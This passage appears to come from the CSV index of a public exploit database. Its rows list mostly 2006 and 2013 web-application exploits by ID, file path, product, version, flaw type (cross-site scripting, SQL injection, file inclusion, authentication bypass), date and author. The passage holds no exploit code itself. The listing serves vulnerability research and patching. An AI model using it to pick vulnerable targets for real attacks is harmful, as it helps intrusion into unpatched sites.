'index.php' Multiple HTML Injection Vulnerabilities",2006-04-05,"Aliaksandr Hartsuyeu",webapps,php, +27571,exploits/php/webapps/27571.txt,"SKForum 1.x - 'area.View.action?areaID' Cross-Site Scripting",2006-04-06,r0t,webapps,php, +27572,exploits/php/webapps/27572.txt,"SKForum 1.x - 'planning.View.action?time' Cross-Site Scripting",2006-04-06,r0t,webapps,php, +27573,exploits/php/webapps/27573.txt,"SKForum 1.x - 'user.View.action?userID' Cross-Site Scripting",2006-04-06,r0t,webapps,php, +27574,exploits/php/webapps/27574.txt,"Basic Analysis and Security Engine (BASE) 1.2.4 - PrintFreshPage Cross-Site Scripting",2003-04-06,"Adam Ely",webapps,php, +27575,exploits/php/webapps/27575.txt,"MD News 1 - 'admin.php' SQL Injection",2006-04-06,"Aliaksandr Hartsuyeu",webapps,php, +27576,exploits/php/webapps/27576.txt,"MAXDEV CMS 1.0.72/1.0.73 - 'PNuserapi.php' SQL Injection",2006-04-06,king_purba,webapps,php, +27578,exploits/php/webapps/27578.txt,"Jupiter CMS 1.1.5 - 'index.php' Cross-Site Scripting",2006-04-07,KaDaL-X,webapps,php, +27579,exploits/php/webapps/27579.txt,"Bitweaver CMS 1.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-07,KaDaL-X,webapps,php, +27580,exploits/php/webapps/27580.txt,"vBulletin 3.5.1 - 'Vbugs.php' Cross-Site Scripting",2006-04-07,r0t,webapps,php, +27582,exploits/php/webapps/27582.txt,"AWeb's Banner Generator 3.0 - Cross-Site Scripting",2006-04-07,benozor77,webapps,php, +27583,exploits/cgi/webapps/27583.txt,"TalentSoft Web+ Shop 5.0 - 'Deptname' Cross-Site Scripting",2006-04-07,r0t,webapps,cgi, +27584,exploits/php/webapps/27584.txt,"JBook 1.3 - 'index.php' Cross-Site Scripting",2006-04-10,Psych0,webapps,php, +27585,exploits/php/webapps/27585.txt,"PHPMyForum 4.0 - 'page' Cross-Site Scripting",2006-04-10,Psych0,webapps,php, +27586,exploits/php/webapps/27586.txt,"PHPMyForum 4.0 - 'index.php?type' CRLF Injection",2006-04-10,Psych0,webapps,php, +27587,exploits/php/webapps/27587.txt,"PHPWebGallery 1.4.1 - 'category.php' Cross-Site Scripting",2006-04-10,Psych0,webapps,php, +27588,exploits/php/webapps/27588.txt,"PHPWebGallery 1.4.1 - 'picture.php' Cross-Site Scripting",2006-04-10,Psych0,webapps,php, +27589,exploits/php/webapps/27589.txt,"SPIP 1.8.3 - 'Spip_login.php' Remote File Inclusion",2006-04-10,cR45H3R,webapps,php, +27590,exploits/php/webapps/27590.txt,"APT-webshop 3.0/4.0 - 'modules.php' Multiple SQL Injections",2005-04-10,r0t,webapps,php, +27591,exploits/php/webapps/27591.txt,"Shadowed Portal 5.7 - 'Load.php' Cross-Site Scripting",2006-04-10,Liz0ziM,webapps,php, +27592,exploits/php/webapps/27592.txt,"SIRE 2.0 - Arbitrary File Upload",2006-04-10,simo64,webapps,php, +27593,exploits/php/webapps/27593.txt,"VegaDNS 0.9.9 - 'index.php?cid' SQL Injection",2006-04-10,Ph03n1X,webapps,php, +27594,exploits/cgi/webapps/27594.txt,"Matt Wright Guestbook 2.3.1 - Guestbook.pl Multiple HTML Injection Vulnerabilities",2006-04-07,Liz0ziM,webapps,cgi, +27597,exploits/php/webapps/27597.txt,"KCFinder 2.51 - Local File Disclosure",2013-08-15,DaOne,webapps,php, +27598,exploits/php/webapps/27598.txt,"Mac's CMS 1.1.4 - Multiple Vulnerabilities",2013-08-15,"Yashar shahinzadeh",webapps,php, +27600,exploits/php/webapps/27600.txt,"Pligg CMS 2.0.0rc2 - Cross-Site Request Forgery (File Creation)",2013-08-15,DaOne,webapps,php, +27601,exploits/php/webapps/27601.txt,"Spitfire CMS 1.1.4 - Cross-Site Request Forgery",2013-08-15,"Yashar shahinzadeh",webapps,php, +27602,exploits/php/webapps/27602.txt,"DotNetNuke DNNArticle Module 10.0 - SQL Injection",2013-08-15,"Sajjad Pourali",webapps,php, +27603,exploits/php/webapps/27603.txt,"w-CMS 2.0.1 - Remote Code Execution",2013-08-15,ICheer_No0M,webapps,php, +27605,exploits/php/webapps/27605.txt,"Alibaba Clone Tritanium Version - 'news_desc.html' SQL Injection",2013-08-15,IRAQ_JAGUAR,webapps,php, +27612,exploits/php/webapps/27612.txt,"ShopWeezle 2.0 - 'login.php?itemID' SQL Injection",2006-04-10,r0t,webapps,php, +27613,exploits/php/webapps/27613.txt,"ShopWeezle 2.0 - 'index.php' Multiple SQL Injections",2006-04-10,r0t,webapps,php, +27614,exploits/php/webapps/27614.txt,"ShopWeezle 2.0 - 'memo.php?itemID' SQL Injection",2006-04-10,r0t,webapps,php, +27615,exploits/php/webapps/27615.txt,"AzDGVote - Remote File Inclusion",2006-04-11,SnIpEr_SA,webapps,php, +27616,exploits/php/webapps/27616.txt,"JetPhoto 1.0/2.0/2.1 - 'thumbnail.php?page' Cross-Site Scripting",2006-04-11,0o_zeus_o0,webapps,php, +27617,exploits/php/webapps/27617.txt,"JetPhoto 1.0/2.0/2.1 - 'gallery.php?page' Cross-Site Scripting",2006-04-11,0o_zeus_o0,webapps,php, +27618,exploits/php/webapps/27618.txt,"JetPhoto 1.0/2.0/2.1 - 'Slideshow.php?name' Cross-Site Scripting",2006-04-11,0o_zeus_o0,webapps,php, +27619,exploits/php/webapps/27619.txt,"JetPhoto 1.0/2.0/2.1 - 'detail.php?page' Cross-Site Scripting",2006-04-11,0o_zeus_o0,webapps,php, +27620,exploits/cgi/webapps/27620.txt,"Microsoft FrontPage - Server Extensions Cross-Site Scripting",2006-04-11,"Esteban Martinez Fayo",webapps,cgi, +27621,exploits/php/webapps/27621.txt,"Clever Copy 3.0 - 'Connect.INC' Information Disclosure",2006-04-11,"M.Hasran Addahroni",webapps,php, +27622,exploits/php/webapps/27622.txt,"Dokeos 1.x - 'viewtopic.php' SQL Injection",2006-04-11,"Alvaro Olavarria",webapps,php, +27623,exploits/php/webapps/27623.txt,"SWSoft Confixx 3.1.2 - 'Jahr' Cross-Site Scripting",2006-04-11,Snake_23,webapps,php, +27624,exploits/php/webapps/27624.txt,"PHPKIT 1.6.1 R2 - 'Include.php' SQL Injection",2006-04-11,"Hamid Ebadi",webapps,php, +27625,exploits/php/webapps/27625.txt,"Indexu 5.0 - Multiple Remote File Inclusions",2006-04-11,SnIpEr_SA,webapps,php, +27626,exploits/php/webapps/27626.txt,"Tritanium Bulletin Board 1.2.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-11,d4igoro,webapps,php, +27628,exploits/php/webapps/27628.txt,"SWSoft Confixx 3.0.6/3.0.8/3.1.2 - 'index.php' SQL Injection",2006-04-11,LoK-Crew,webapps,php, +27629,exploits/php/webapps/27629.txt,"Chipmunk Guestbook 1.3 - 'index.php' SQL Injection",2006-04-12,Dr.Jr7,webapps,php, +27631,exploits/cgi/webapps/27631.txt,"Interaktiv.shop 4/5 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-12,r0t,webapps,cgi, +27632,exploits/php/webapps/27632.txt,"phpMyAdmin 2.7 - 'sql.php' Cross-Site Scripting",2005-10-31,p0w3r,webapps,php, +27638,exploits/php/webapps/27638.pl,"SimpleBBS 1.0.6/1.0.7/1.1 - Arbitrary Command Execution",2006-04-13,rUnViRuS,webapps,php, +27642,exploits/php/webapps/27642.txt,"AR-Blog 5.2 - 'print.php' Cross-Site Scripting",2006-04-14,ALMOKANN3,webapps,php, +27643,exploits/php/webapps/27643.php,"PHPAlbum 0.2.2/0.2.3/4.1 - 'Language.php' File Inclusion",2006-04-15,rgod,webapps,php, +27644,exploits/php/webapps/27644.txt,"PlanetSearch + - 'Planetsearchplus.php' Cross-Site Scripting",2006-04-13,d4igoro,webapps,php, +27645,exploits/php/webapps/27645.txt,"PowerClan 1.14 - 'member.php' SQL Injection",2006-04-13,d4igoro,webapps,php, +27646,exploits/php/webapps/27646.txt,"LifeType 1.0.3 - 'index.php' Cross-Site Scripting",2006-04-13,"Rusydi Hasan",webapps,php, +27647,exploits/php/webapps/27647.txt,"Papoo 2.1.x - 'print.php' Cross-Site Scripting",2006-04-14,"Rusydi Hasan",webapps,php, +27648,exploits/php/webapps/27648.txt,"MODx CMS 0.9.1 - 'index.php' Cross-Site Scripting",2006-04-14,"Rusydi Hasan",webapps,php, +27649,exploits/php/webapps/27649.txt,"MODx CMS 0.9.1 - 'index.php' Directory Traversal",2006-04-14,"Rusydi Hasan",webapps,php, +27650,exploits/php/webapps/27650.txt,"Farsinews 2.1/2.5 - 'search.php' Cross-Site Scripting",2006-04-14,"amin emami",webapps,php, +27651,exploits/php/webapps/27651.txt,"Tiny Web Gallery 1.4 - 'index.php' Cross-Site Scripting",2006-04-15,Qex,webapps,php, +27652,exploits/php/webapps/27652.txt,"Quack Chat 1.0 - Multiple Vulnerabilities",2013-08-17,"Dylan Irzi",webapps,php,80 +27970,exploits/php/webapps/27970.txt,"CyBoards PHP Lite 1.21/1.25 - 'Common.php' Remote File Inclusion",2006-06-05,SpC-x,webapps,php, +27655,exploits/ios/webapps/27655.txt,"Copy to WebDAV 1.1 iOS - Multiple Vulnerabilities",2013-08-17,Vulnerability-Lab,webapps,ios, +27656,exploits/ios/webapps/27656.txt,"Photo Transfer Upload 1.0 iOS - Multiple Vulnerabilities",2013-08-17,Vulnerability-Lab,webapps,ios, +27658,exploits/php/webapps/27658.txt,"PHPGuestbook 0.0.2/1.0 - HTML Injection",2006-04-15,Qex,webapps,php, +27659,exploits/php/webapps/27659.txt,"PHPFaber TopSites - 'index.php' Cross-Site Scripting",2006-04-17,botan,webapps,php, +27660,exploits/php/webapps/27660.txt,"Monster Top List 1.4 - 'functions.php' Remote File Inclusion",2006-04-17,r0t,webapps,php, +27661,exploits/php/webapps/27661.txt,"TinyPHPForum 3.6 - Multiple Cross-Site Scripting Vulnerabilities (1)",2006-04-17,Hessam-x,webapps,php, +27662,exploits/php/webapps/27662.txt,"Blursoft Blur6ex 0.3.462 - 'index.php' Local File Inclusion",2006-04-17,"Hamid Ebadi",webapps,php, +27663,exploits/php/webapps/27663.txt,"DbbS 2.0 - Multiple Input Validation Vulnerabilities",2006-04-17,rgod,webapps,php, +27664,exploits/php/webapps/27664.txt,"Jax Guestbook 3.50 - 'Page' Cross-Site Scripting",2006-04-17,ALMOKANN3,webapps,php, +27665,exploits/php/webapps/27665.txt,"Calendarix 0.7 - 'YearCal.php' Cross-Site Scripting",2006-04-17,botan,webapps,php, +27666,exploits/php/webapps/27666.txt,"Manila 9.0.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-17,"Aaron Kaplan",webapps,php, +27667,exploits/php/webapps/27667.txt,"MyBB 1.1 - Global Variable Overwrite",2006-04-17,imei,webapps,php, +27669,exploits/php/webapps/27669.txt,"Coppermine 1.4.4 - 'index.php' Local File Inclusion",2006-04-17,imei,webapps,php, +27672,exploits/cgi/webapps/27672.txt,"axoverzicht.CGI - Cross-Site Scripting",2006-04-18,Qex,webapps,cgi, +27673,exploits/php/webapps/27673.txt,"PHPLinks 2.1.2/2.1.3 - 'index.php' Cross-Site Scripting",2006-04-18,r0t,webapps,php, +27674,exploits/php/webapps/27674.txt,"RechnungsZentrale 2 1.1.3 - 'Authent.php4' SQL Injection",2006-04-18,"GroundZero Security",webapps,php, +27675,exploits/php/webapps/27675.txt,"PHPLister 0.4.1 - 'index.php' Cross-Site Scripting",2006-04-18,botan,webapps,php, +27676,exploits/php/webapps/27676.txt,"CutePHP CuteNews 1.4.1 Editnews Module - Cross-Site Scripting",2006-04-19,LoK-Crew,webapps,php, +27677,exploits/php/webapps/27677.txt,"Article Publisher 1.0.1 Pro - Multiple SQL Injections",2006-04-19,r0t,webapps,php, +27678,exploits/php/webapps/27678.txt,"ModernBill 4.3 - 'user.php' SQL Injection",2006-04-19,r0t,webapps,php, +27679,exploits/cgi/webapps/27679.txt,"Visale 1.0 - 'pbpgst.cgi?keyval' Cross-Site Scripting",2006-04-19,r0t,webapps,cgi, +27680,exploits/cgi/webapps/27680.txt,"Visale 1.0 - 'pblscg.cgi?catsubno' Cross-Site Scripting",2006-04-19,r0t,webapps,cgi, +27681,exploits/cgi/webapps/27681.txt,"Visale 1.0 - 'pblsmb.cgi?listno' Cross-Site Scripting",2006-04-19,r0t,webapps,cgi, +27682,exploits/cgi/webapps/27682.txt,"CommuniMail 1.2 - 'mailadmin.cgi?list_id' Cross-Site Scripting",2006-04-19,r0t,webapps,cgi, +27683,exploits/cgi/webapps/27683.txt,"CommuniMail 1.2 - 'templates.cgi?form_id' Cross-Site Scripting",2006-04-19,r0t,webapps,cgi, +27684,exploits/jsp/webapps/27684.txt,"Cisco Wireless Lan Solution Engine - ArchiveApplyDisplay.jsp Cross-Site Scripting",2006-04-19,"Adam Pointon",webapps,jsp, +27685,exploits/cgi/webapps/27685.txt,"IntelliLink Pro 5.06 - 'addlink_lwp.cgi?url' Cross-Site Scripting",2006-04-19,r0t,webapps,cgi, +27686,exploits/cgi/webapps/27686.txt,"IntelliLink Pro 5.06 - 'edit.cgi' Multiple Cross-Site Scripting Vulnerabilities",2006-04-19,r0t,webapps,cgi, +27687,exploits/php/webapps/27687.txt,"ThWboard 2.8 - 'showtopic.php' SQL Injection",2006-04-19,Qex,webapps,php, +27688,exploits/php/webapps/27688.txt,"ContentBoxx - 'login.php' Cross-Site Scripting",2006-04-19,botan,webapps,php, +27689,exploits/cgi/webapps/27689.txt,"BannerFarm 2.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-19,r0t,webapps,cgi, +27690,exploits/cgi/webapps/27690.txt,"xFlow 5.46.11 - 'index.cgi' Multiple SQL Injections",2006-04-19,r0t,webapps,cgi, +27691,exploits/cgi/webapps/27691.txt,"xFlow 5.46.11 - 'index.cgi' Multiple Cross-Site Scripting Vulnerabilities",2006-04-19,r0t,webapps,cgi, +27692,exploits/php/webapps/27692.txt,"Plexum PlexCart X5 - Multiple SQL Injections",2006-04-19,r0t,webapps,php, +27693,exploits/php/webapps/27693.txt,"otalCalendar - 'about.php?inc_dir' Remote File Inclusion",2006-04-19,VietMafia,webapps,php, +27694,exploits/cgi/webapps/27694.txt,"AWStats 4.0/5.x/6.x - AWStats.pl Multiple Cross-Site Scripting Vulnerabilities",2006-04-19,r0t,webapps,cgi, +27695,exploits/cgi/webapps/27695.txt,"Net Clubs Pro 4.0 - 'sendim.cgi' Multiple Cross-Site Scripting Vulnerabilities",2006-04-20,r0t,webapps,cgi, +27696,exploits/cgi/webapps/27696.txt,"Net Clubs Pro 4.0 - 'imessage.cgi?Username' Cross-Site Scripting",2006-04-20,r0t,webapps,cgi, +27697,exploits/cgi/webapps/27697.txt,"Net Clubs Pro 4.0 - 'login.cgi?Password' Cross-Site Scripting",2006-04-20,r0t,webapps,cgi, +28055,exploits/hardware/webapps/28055.txt,"TP-Link TD-W8951ND - Multiple Vulnerabilities",2013-09-03,xistence,webapps,hardware, +28057,exploits/php/webapps/28057.txt,"Cline Communications - Multiple SQL Injections",2006-06-17,Liz0ziM,webapps,php, +28058,exploits/php/webapps/28058.txt,"Eduha Meeting - 'index.php' Arbitrary File Upload",2006-06-19,Liz0ziM,webapps,php, +28061,exploits/asp/webapps/28061.txt,"Cisco CallManager 3.x/4.x - 'Web Interface 'ccmadmin/phonelist.asp?Pattern' Cross-Site Scripting",2006-06-19,"Jake Reynolds",webapps,asp, +28062,exploits/asp/webapps/28062.txt,"Cisco CallManager 3.x/4.x - 'Web Interface 'ccmuser/logon.asp' Cross-Site Scripting",2006-06-19,"Jake Reynolds",webapps,asp, +28700,exploits/php/webapps/28700.txt,"CubeCart 3.0.x - 'view_order.php?order_id' Cross-Site Scripting",2006-09-26,"HACKERS PAL",webapps,php, +28053,exploits/hardware/webapps/28053.txt,"Zoom Telephonics ADSL Modem/Router - Multiple Vulnerabilities",2013-09-03,"Kyle Lovett",webapps,hardware, +28054,exploits/php/webapps/28054.txt,"WordPress Plugin IndiaNIC Testimonial - Multiple Vulnerabilities",2013-09-03,RogueCoder,webapps,php, +27707,exploits/php/webapps/27707.txt,"I-RATER Platinum - 'Common.php' Remote File Inclusion",2006-04-20,r0t,webapps,php, +27709,exploits/php/webapps/27709.txt,"4homepages 4Images 1.7 - 'member.php' Cross-Site Scripting",2006-04-20,Qex,webapps,php, +27710,exploits/php/webapps/27710.txt,"W2B Online Banking - 'SID' Cross-Site Scripting",2006-04-20,r0t,webapps,php, +27975,exploits/php/webapps/27975.txt,"Bookmark4U 2.0 - '/inc/common.php?env[include_prefix]' Remote File Inclusion",2006-06-05,SnIpEr_SA,webapps,php, +27976,exploits/php/webapps/27976.txt,"Bookmark4U 2.0 - '/inc/function.php?env[include_prefix]' Remote File Inclusion",2006-06-05,SnIpEr_SA,webapps,php, +27977,exploits/php/webapps/27977.txt,"Kmita FAQ 1.0 - 'search.php?q' Cross-Site Scripting",2006-06-05,Luny,webapps,php, +27978,exploits/php/webapps/27978.txt,"Kmita FAQ 1.0 - 'index.php?catid' SQL Injection",2006-06-05,Luny,webapps,php, +28694,exploits/php/webapps/28694.txt,"vBulletin 2.3.x - 'global.php' SQL Injection",2006-09-26,"HACKERS PAL",webapps,php, +27711,exploits/php/webapps/27711.txt,"ThWboard 3.0 - 'index.php' Cross-Site Scripting",2006-04-20,"CrAzY CrAcKeR",webapps,php, +27712,exploits/cgi/webapps/27712.txt,"Portal Pack 6.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-20,r0t,webapps,cgi, +27713,exploits/php/webapps/27713.txt,"Manic Web MWGuest 2.1 - 'MWguest.php' HTML Injection",2006-04-20,"Aliaksandr Hartsuyeu",webapps,php, +27717,exploits/php/webapps/27717.txt,"phpLDAPadmin 0.9.8 - 'compare_form.php' Cross-Site Scripting",2006-04-21,r0t,webapps,php, +27718,exploits/php/webapps/27718.txt,"phpLDAPadmin 0.9.8 - 'copy_form.php' Cross-Site Scripting",2006-04-21,r0t,webapps,php, +27719,exploits/php/webapps/27719.txt,"phpLDAPadmin 0.9.8 - 'rename_form.php' Cross-Site Scripting",2006-04-21,r0t,webapps,php, +33404,exploits/php/webapps/33404.txt,"phpFaber CMS 1.3.36 - 'module.php' Cross-Site Scripting",2009-12-14,bi0,webapps,php, +27721,exploits/php/webapps/27721.txt,"phpLDAPadmin 0.9.8 - 'search.php' Cross-Site Scripting",2006-04-21,r0t,webapps,php, +27722,exploits/php/webapps/27722.txt,"phpLDAPadmin 0.9.8 - 'template_engine.php' Cross-Site Scripting",2006-04-21,r0t,webapps,php, +27724,exploits/php/webapps/27724.txt,"Scry Gallery - Directory Traversal",2006-04-21,"Morocco Security Team",webapps,php, +27725,exploits/php/webapps/27725.txt,"MKPortal 1.1 - Multiple Input Validation Vulnerabilities",2006-04-22,"Mustafa Can Bjorn IPEKCI",webapps,php, +27726,exploits/php/webapps/27726.txt,"Simplog 0.9.3 - 'ImageList.php' Cross-Site Scripting",2006-04-22,nukedx,webapps,php, +27731,exploits/php/webapps/27731.txt,"PhotoKorn 1.53/1.54 - 'index.php' Multiple SQL Injections",2006-04-25,Dr.Jr7,webapps,php, +27732,exploits/php/webapps/27732.txt,"PhotoKorn 1.53/1.54 - 'id' SQL Injection",2006-04-25,Dr.Jr7,webapps,php, +27733,exploits/php/webapps/27733.txt,"PhotoKorn 1.53/1.54 - 'print.php?cat' SQL Injection",2006-04-25,Dr.Jr7,webapps,php, +27734,exploits/php/webapps/27734.txt,"NextAge Shopping Cart - Multiple HTML Injection Vulnerabilities",2006-04-25,R@1D3N,webapps,php, +27735,exploits/php/webapps/27735.txt,"PHPWebFTP 2.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-25,arko.dhar,webapps,php, +27736,exploits/php/webapps/27736.txt,"Invision Power Board 2.0/2.1 - 'index.php?CK' SQL Injection",2006-05-25,IceShaman,webapps,php, +27737,exploits/php/webapps/27737.txt,"Instant Photo Gallery 1.0 - 'member.php?member' Cross-Site Scripting",2006-04-25,Qex,webapps,php, +27738,exploits/php/webapps/27738.txt,"Instant Photo Gallery 1.0 - 'portfolio.php?cat_id' Cross-Site Scripting",2006-04-25,Qex,webapps,php, +27739,exploits/php/webapps/27739.txt,"Instant Photo Gallery 1.0 - 'portfolio_photo_popup.php?id' Cross-Site Scripting",2006-04-25,Qex,webapps,php, +27740,exploits/php/webapps/27740.txt,"CuteNews 1.4.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-26,outlaw.dll,webapps,php, +27741,exploits/php/webapps/27741.txt,"Farsinews 2.5.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-26,O.U.T.L.A.W.,webapps,php, +27742,exploits/php/webapps/27742.txt,"DevBB 1.0 - 'member.php' Cross-Site Scripting",2006-04-26,Qex,webapps,php, +27743,exploits/php/webapps/27743.txt,"MySmartBB 1.1.2/1.1.3 - Multiple Input Validation Vulnerabilities",2006-04-04,BoNy-m,webapps,php, +27750,exploits/php/webapps/27750.py,"Bitbot (C2 Web Panel) - 'gate2.php' Multiple Vulnerabilities",2013-08-21,bwall,webapps,php, +27751,exploits/php/webapps/27751.txt,"WordPress Plugin ThinkIT 0.1 - Multiple Vulnerabilities",2013-08-21,"Yashar shahinzadeh",webapps,php, +27753,exploits/hardware/webapps/27753.txt,"Samsung DVR Firmware 1.10 - Authentication Bypass",2013-08-21,"Andrea Fabrizi",webapps,hardware,80 +27755,exploits/windows/webapps/27755.txt,"Adobe ColdFusion 9 - Administrative Authentication Bypass",2013-08-21,"Scott Buckel",webapps,windows, +27756,exploits/hardware/webapps/27756.txt,"Sitecom N300/N600 Devices - Multiple Vulnerabilities",2013-08-21,"Roberto Paleari",webapps,hardware, +27757,exploits/asp/webapps/27757.txt,"DUclassified - 'detail.asp' SQL Injection",2006-04-28,sadegh.sarshogh,webapps,asp, +27761,exploits/cgi/webapps/27761.txt,"NeoMail - 'NeoMail.pl?sessionid' Cross-Site Scripting",2006-04-28,O.U.T.L.A.W,webapps,cgi, +27763,exploits/php/webapps/27763.php,"I-RATER Platinum - 'Config_settings.TPL.php' Remote File Inclusion",2006-04-28,O.U.T.L.A.W,webapps,php, +27767,exploits/php/webapps/27767.txt,"Artmedic Event - 'index.php' Remote File Inclusion",2006-04-28,botan,webapps,php, +27768,exploits/php/webapps/27768.php,"CoolMenus 4.0 - 'index.php' Remote File Inclusion",2006-04-28,botan,webapps,php, +27770,exploits/php/webapps/27770.txt,"Blog 0.2.3/0.2.4 Mod - 'Weblog_posting.php' SQL Injection",2006-04-29,Qex,webapps,php, +27771,exploits/php/webapps/27771.txt,"Ovidentia 7.9.4 - Multiple Vulnerabilities",2013-08-22,LiquidWorm,webapps,php,80 +27855,exploits/php/webapps/27855.txt,"Vizra - 'A_Login.php' Cross-Site Scripting",2006-05-11,R00TT3R,webapps,php, +27857,exploits/php/webapps/27857.txt,"phpBB Chart Mod 1.1 - 'charts.php?id' SQL Injection",2006-05-11,sn4k3.23,webapps,php, +27773,exploits/php/webapps/27773.txt,"CBHotel Hotel Software and Booking system 1.8 - Multiple Vulnerabilities",2013-08-22,"Dylan Irzi",webapps,php, +27774,exploits/hardware/webapps/27774.py,"NETGEAR ProSafe - Information Disclosure",2013-08-22,"Juan J. Guelfo",webapps,hardware, +27776,exploits/linux/webapps/27776.rb,"Foreman (RedHat OpenStack/Satellite) - users/create Mass Assignment (Metasploit)",2013-08-22,Metasploit,webapps,linux,443 +27777,exploits/windows/webapps/27777.txt,"DeWeS 0.4.2 - Directory Traversal",2013-08-22,"High-Tech Bridge SA",webapps,windows, +27779,exploits/php/webapps/27779.txt,"Advanced Guestbook 2.x - 'Addentry.php' Remote File Inclusion",2006-04-29,[Oo],webapps,php, +27780,exploits/php/webapps/27780.txt,"4Images 1.7.1 - 'top.php?sessionid' SQL Injection",2006-04-29,CrAzY.CrAcKeR,webapps,php, +27781,exploits/php/webapps/27781.txt,"4Images 1.7.1 - 'member.php?sessionid' SQL Injection",2006-04-29,CrAzY.CrAcKeR,webapps,php, +27782,exploits/php/webapps/27782.txt,"TextFileBB 1.0.16 - Multiple Tag Script Injection Vulnerabilities",2006-04-29,r0xes,webapps,php, +27783,exploits/php/webapps/27783.txt,"W-Agora 4.2 - BBCode Script Injection",2006-04-29,r0xes,webapps,php, +27784,exploits/php/webapps/27784.txt,"PlanetGallery - 'Gallery_admin.php' Authentication Bypass",2006-04-29,tugr@,webapps,php, +27785,exploits/php/webapps/27785.txt,"DMCounter 0.9.2 -b - 'Kopf.php' Remote File Inclusion",2006-05-01,beford,webapps,php, +27786,exploits/php/webapps/27786.txt,"phpBB Knowledge Base 2.0.2 - 'Mod KB_constants.php' Remote File Inclusion",2006-05-01,[Oo],webapps,php, +27787,exploits/php/webapps/27787.txt,"MaxTrade 1.0.1 - Multiple SQL Injections",2006-05-01,r0t,webapps,php, +27788,exploits/php/webapps/27788.txt,"OrbitHYIP 2.0 - 'signup.php?referral' Cross-Site Scripting",2006-05-01,r0t,webapps,php, +27789,exploits/php/webapps/27789.txt,"OrbitHYIP 2.0 - 'members.php?id' Cross-Site Scripting",2006-05-01,r0t,webapps,php, +27792,exploits/php/webapps/27792.txt,"SunShop Shopping Cart 3.5 - Multiple Cross-Site Scripting Vulnerabilities",2006-05-01,r0t,webapps,php, +27793,exploits/php/webapps/27793.txt,"Collaborative Portal Server 3.4 - 'POS' Cross-Site Scripting",2006-05-01,r0t,webapps,php, +27794,exploits/php/webapps/27794.txt,"JSBoard 2.0.10/2.0.11 - 'login.php' Cross-Site Scripting",2006-05-02,"Alexander Klink",webapps,php, +27795,exploits/php/webapps/27795.txt,"ZenPhoto 0.9/1.0 - 'i.php?a' Cross-Site Scripting",2006-05-02,zone14,webapps,php, +27796,exploits/php/webapps/27796.txt,"ZenPhoto 0.9/1.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-05-02,zone14,webapps,php, +27797,exploits/php/webapps/27797.txt,"XDT Pro 2.3 - 'stats.php' Cross-Site Scripting",2006-05-02,almaster,webapps,php, +27798,exploits/php/webapps/27798.txt,"GeoBlog MOD_1.0 - 'viewcat.php' Cross-Site Scripting",2006-05-02,SubjectZero,webapps,php, +27799,exploits/php/webapps/27799.txt,"Virtual Hosting Control System 2.4.7.1 - 'Server_day_stats.php' Multiple Cross-Site Scripting Vulnerabilities",2006-05-02,O.U.T.L.A.W,webapps,php, +27800,exploits/php/webapps/27800.txt,"Pinnacle Cart 3.3 - 'index.php' Cross-Site Scripting",2006-05-02,r0t,webapps,php, +27803,exploits/php/webapps/27803.txt,"321soft PHP-Gallery 0.9 - 'index.php?path' Arbitrary Directory Listing",2006-05-03,d4igoro,webapps,php, +27804,exploits/php/webapps/27804.txt,"321soft PHP-Gallery 0.9 - 'index.php?path' Cross-Site Scripting",2006-05-03,d4igoro,webapps,php, +27807,exploits/php/webapps/27807.txt,"Fast Click SQL Lite 1.1.2/1.1.3 - 'show.php' Remote File Inclusion",2006-05-03,R@1D3N,webapps,php, +27808,exploits/php/webapps/27808.txt,"Pacheckbook 1.1 - 'index.php' Multiple SQL Injections",2006-05-03,almaster,webapps,php, +27809,exploits/php/webapps/27809.txt,"MyNews 1.6.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-05-03,DreamLord,webapps,php, +27810,exploits/php/webapps/27810.txt,"Albinator 2.0.8 - 'dlisting.php?cid' Cross-Site Scripting",2006-05-02,r0t,webapps,php, +27811,exploits/php/webapps/27811.txt,"Albinator 2.0.8 - 'showpic.php?preloadSlideShow' Cross-Site Scripting",2006-05-02,r0t,webapps,php, +27812,exploits/php/webapps/27812.txt,"PHP Linkliste 1.0 - 'Linkliste.php' Multiple Cross-Site Scripting Vulnerabilities",2006-05-03,d4igoro,webapps,php, +27813,exploits/asp/webapps/27813.txt,"CyberBuild - 'login.asp?sessionid' SQL Injection",2006-05-03,r0t,webapps,asp, +27814,exploits/asp/webapps/27814.txt,"CyberBuild - 'browse0.htm?ProductIndex' SQL Injection",2006-05-03,r0t,webapps,asp, +27815,exploits/asp/webapps/27815.txt,"CyberBuild - 'login.asp?sessionid' Cross-Site Scripting",2006-05-03,r0t,webapps,asp, +27816,exploits/asp/webapps/27816.txt,"CyberBuild - 'browse0.htm?ProductIndex' Cross-Site Scripting",2006-05-03,r0t,webapps,asp, +27817,exploits/asp/webapps/27817.txt,"CyberBuild - 'result.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-05-03,r0t,webapps,asp, +27818,exploits/php/webapps/27818.txt,"Invision Power Board 2.0/2.1 - 'index.php' SQL Injection",2006-05-04,almaster,webapps,php, +27819,exploits/php/webapps/27819.txt,"CuteNews 1.4.1 - 'search.php' Multiple Cross-Site Scripting Vulnerabilities",2006-05-05,NST,webapps,php, +27821,exploits/php/webapps/27821.html,"OpenFAQ 0.4 - 'Validate.php' HTML Injection",2006-05-06,"Kamil Sienicki",webapps,php, +27822,exploits/php/webapps/27822.txt,"MyBloggie 2.1.2/2.1.3 - BBCode IMG Tag HTML Injection",2006-05-06,zerogue,webapps,php, +27823,exploits/php/webapps/27823.txt,"openEngine 1.7/1.8 - Template Unauthorized Access",2006-05-08,ck@caroli.info,webapps,php, +27824,exploits/php/webapps/27824.txt,"Singapore 0.9.7 - 'index.php' Cross-Site Scripting",2006-05-08,alp_eren@ayyildiz.org,webapps,php, +27825,exploits/asp/webapps/27825.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 - '/admin/main.asp?date' SQL Injection",2006-05-08,dj_eyes2005,webapps,asp, +27826,exploits/asp/webapps/27826.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 - '/admin/view.asp?searchFor' SQL Injection",2006-05-08,dj_eyes2005,webapps,asp, +27827,exploits/asp/webapps/27827.txt,"Ocean12 Technologies 